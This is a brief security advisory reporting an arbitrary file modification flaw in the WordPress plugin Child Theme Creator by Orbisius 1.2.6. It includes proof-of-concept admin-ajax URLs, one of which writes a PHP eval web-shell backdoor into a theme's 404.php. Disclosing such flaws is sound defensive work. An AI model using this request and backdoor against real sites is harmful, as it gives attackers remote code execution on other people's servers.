Hello,

Plugin: Child Theme Creator by Orbisius 1.2.6 https://wordpress.org/plugins/orbisius-child-theme-creator/

Remote authenticated users can write arbitrary content to existing files in theme 

directory.

1. Arbirtrary file modification (orbisius_ctc_theme_editor_manage_file()).

Method: GET

URL: http://localhost/wp-admin/admin-ajax.php?action=orbisius_ctc_theme_editor_ajax&sub_cmd=save_file&theme_1=twentythirteen&theme_1_file=404.php&theme_1_file_contents=NEW_FILE_CONTENT

Vulnerable parameters: theme_1, theme_1_file, theme_1_file_contents

Example PHP callstack:

  orbisius_ctc_theme_editor_ajax   [/orbisius-child-theme-creator/orbisius-child-theme-creator.php:2219]

  orbisius_ctc_theme_editor_manage_file   [/orbisius-child-theme-creator/orbisius-child-theme-creator.php:2494]

Verification:

Putting backdoor in /wordpress/wp-content/themes/twentythirteen/404.php

http://localhost/wp-admin/admin-ajax.php?action=orbisius_ctc_theme_editor_ajax&sub_cmd=save_file&theme_1=twentythirteen&theme_1_file=404.php&theme_1_file_contents=<?php eval($_GET['e']);